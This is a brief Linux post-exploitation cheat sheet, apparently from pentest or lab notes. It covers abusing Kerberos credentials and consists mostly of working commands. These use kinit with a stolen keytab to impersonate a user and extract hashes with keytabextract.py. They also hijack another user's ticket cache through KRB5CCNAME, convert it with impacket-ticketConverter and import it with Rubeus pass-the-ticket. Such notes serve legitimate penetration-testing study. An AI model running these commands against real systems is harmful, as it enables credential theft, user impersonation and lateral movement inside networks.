Linux Post-Exploitation

Abusing Keytab

Impersonate user

klist -k -t #list keytab file info
kinit carni7@AMOGUS.KEK -k -t /opt/kerbusers/carni7.keytab #impersonation carni7 using his keytab

KeyTabExtract

This is tool which is extracting Kerberos hashes from keytab file.

python3 /opt/keytabextract.py /opt/specialfiles/carni7.keytab

Abusing ccache

For using ccache files you need to have root privileges

Checking group privileges

id venator177@amogus.kek

Now after locating right non-expired Kerberos ticket, we could import ccache file into our session by changing value of KRB5CCNAME env and checking tickets with klist.

cp /tmp/krb5cc_768304578_BRB541 .
export KRB5CCNAME=/root/krb5cc_768304578_BRB541
klist
Ticket cache: FILE:/root/krb5cc_768304578_BRB541

If the result is the same, we could be sure that now Kerberos is using our ticket.

Ticket Converter

impacket-ticketConverter krb5cc_768304578_BRB541 carni7.kirbi

Importing Kerberos Ticket

C:\Rubeus.exe ptt /ticket:c:\carni7.kirbi

Last updated 25 days ago